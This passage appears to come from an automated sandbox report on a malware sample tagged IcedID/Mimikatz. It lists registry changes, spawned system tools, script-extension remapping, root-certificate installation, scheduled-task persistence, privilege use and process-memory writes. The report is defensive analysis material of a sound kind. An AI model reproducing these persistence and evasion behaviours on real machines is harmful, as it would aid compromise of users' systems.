\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language etwsuhquc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lvutgsgsu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lbbuleg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2680 cmd.exe 2768 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000016df8-5.dat nsis_installer_2 behavioral1/files/0x0007000000017570-17.dat nsis_installer_1 behavioral1/files/0x0007000000017570-17.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
lbbuleg.exenetsh.exesyvsdbgfd.exenetsh.exenetsh.exenetsh.exenetsh.exesyvsdbgfd.exenetsh.exenetsh.exesyvsdbgfd.exesyvsdbgfd.exenetsh.exenetsh.exenetsh.exesyvsdbgfd.exesyvsdbgfd.exenetsh.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{938E8C25-2583-4F91-A636-4D8D208AB044} lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{938E8C25-2583-4F91-A636-4D8D208AB044}\8e-96-df-d6-e6-fd lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates lbbuleg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-96-df-d6-e6-fd\WpadDecisionReason = "1" lbbuleg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-96-df-d6-e6-fd\WpadDecision = "0" lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs lbbuleg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs lbbuleg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump syvsdbgfd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump syvsdbgfd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-96-df-d6-e6-fd\WpadDecisionTime = 309e0c4f3221db01 lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{938E8C25-2583-4F91-A636-4D8D208AB044}\WpadDecisionTime = 90c2fa183221db01 lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-96-df-d6-e6-fd lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-96-df-d6-e6-fd\WpadDecisionTime = 90c2fa183221db01 lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lbbuleg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates lbbuleg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" lbbuleg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates lbbuleg.exe -
Modifies registry class 14 IoCs
Processes:
lbbuleg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ lbbuleg.exe -
Processes:
lbbuleg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 lbbuleg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 lbbuleg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 1276 schtasks.exe 1596 schtasks.exe 1260 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
Processes:
lbbuleg.exelbbuleg.exepid Process 1072 lbbuleg.exe 2280 lbbuleg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lbbuleg.exepid Process 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe -
Suspicious behavior: LoadsDriver 31 IoCs
Processes:
pid Process 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 480 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exepid Process 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exelbbuleg.exelbbuleg.exevfshost.exesvchost.exesyvsdbgfd.exetushzd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exedescription pid Process Token: SeDebugPrivilege 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2812 lbbuleg.exe Token: SeDebugPrivilege 2808 lbbuleg.exe Token: SeDebugPrivilege 3068 vfshost.exe Token: SeAuditPrivilege 2624 svchost.exe Token: SeDebugPrivilege 688 syvsdbgfd.exe Token: SeShutdownPrivilege 688 syvsdbgfd.exe Token: SeLockMemoryPrivilege 2304 tushzd.exe Token: SeLockMemoryPrivilege 2304 tushzd.exe Token: SeDebugPrivilege 2068 syvsdbgfd.exe Token: SeShutdownPrivilege 2068 syvsdbgfd.exe Token: SeDebugPrivilege 2696 syvsdbgfd.exe Token: SeShutdownPrivilege 2696 syvsdbgfd.exe Token: SeDebugPrivilege 536 syvsdbgfd.exe Token: SeShutdownPrivilege 536 syvsdbgfd.exe Token: SeDebugPrivilege 2760 syvsdbgfd.exe Token: SeShutdownPrivilege 2760 syvsdbgfd.exe Token: SeDebugPrivilege 1724 syvsdbgfd.exe Token: SeShutdownPrivilege 1724 syvsdbgfd.exe Token: SeDebugPrivilege 2076 syvsdbgfd.exe Token: SeShutdownPrivilege 2076 syvsdbgfd.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exelbbuleg.exelbbuleg.exexohudmc.exehuzbeq.exelbbuleg.exelbbuleg.exepid Process 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 2812 lbbuleg.exe 2812 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 704 xohudmc.exe 1732 huzbeq.exe 1072 lbbuleg.exe 1072 lbbuleg.exe 2280 lbbuleg.exe 2280 lbbuleg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execmd.exelbbuleg.execmd.execmd.exewpcap.exedescription pid Process procid_target PID 2996 wrote to memory of 2680 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 30 PID 2996 wrote to memory of 2680 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 30 PID 2996 wrote to memory of 2680 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 30 PID 2996 wrote to memory of 2680 2996 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe 30 PID 2680 wrote to memory of 2768 2680 cmd.exe 32 PID 2680 wrote to memory of 2768 2680 cmd.exe 32 PID 2680 wrote to memory of 2768 2680 cmd.exe 32 PID 2680 wrote to memory of 2768 2680 cmd.exe 32 PID 2680 wrote to memory of 2812 2680 cmd.exe 33 PID 2680 wrote to memory of 2812 2680 cmd.exe 33 PID 2680 wrote to memory of 2812 2680 cmd.exe 33 PID 2680 wrote to memory of 2812 2680 cmd.exe 33 PID 2808 wrote to memory of 2588 2808 lbbuleg.exe 35 PID 2808 wrote to memory of 2588 2808 lbbuleg.exe 35 PID 2808 wrote to memory of 2588 2808 lbbuleg.exe 35 PID 2808 wrote to memory of 2588 2808 lbbuleg.exe 35 PID 2588 wrote to memory of 2716 2588 cmd.exe 37 PID 2588 wrote to memory of 2716 2588 cmd.exe 37 PID 2588 wrote to memory of 2716 2588 cmd.exe 37 PID 2588 wrote to memory of 2716 2588 cmd.exe 37 PID 2588 wrote to memory of 2596 2588 cmd.exe 38 PID 2588 wrote to memory of 2596 2588 cmd.exe 38 PID 2588 wrote to memory of 2596 2588 cmd.exe 38 PID 2588 wrote to memory of 2596 2588 cmd.exe 38 PID 2588 wrote to memory of 2564 2588 cmd.exe 39 PID 2588 wrote to memory of 2564 2588 cmd.exe 39 PID 2588 wrote to memory of 2564 2588 cmd.exe 39 PID 2588 wrote to memory of 2564 2588 cmd.exe 39 PID 2588 wrote to memory of 2580 2588 cmd.exe 40 PID 2588 wrote to memory of 2580 2588 cmd.exe 40 PID 2588 wrote to memory of 2580 2588 cmd.exe 40 PID 2588 wrote to memory of 2580 2588 cmd.exe 40 PID 2588 wrote to memory of 2624 2588 cmd.exe 41 PID 2588 wrote to memory of 2624 2588 cmd.exe 41 PID 2588 wrote to memory of 2624 2588 cmd.exe 41 PID 2588 wrote to memory of 2624 2588 cmd.exe 41 PID 2588 wrote to memory of 2672 2588 cmd.exe 42 PID 2588 wrote to memory of 2672 2588 cmd.exe 42 PID 2588 wrote to memory of 2672 2588 cmd.exe 42 PID 2588 wrote to memory of 2672 2588 cmd.exe 42 PID 2808 wrote to memory of 2988 2808 lbbuleg.exe 43 PID 2808 wrote to memory of 2988 2808 lbbuleg.exe 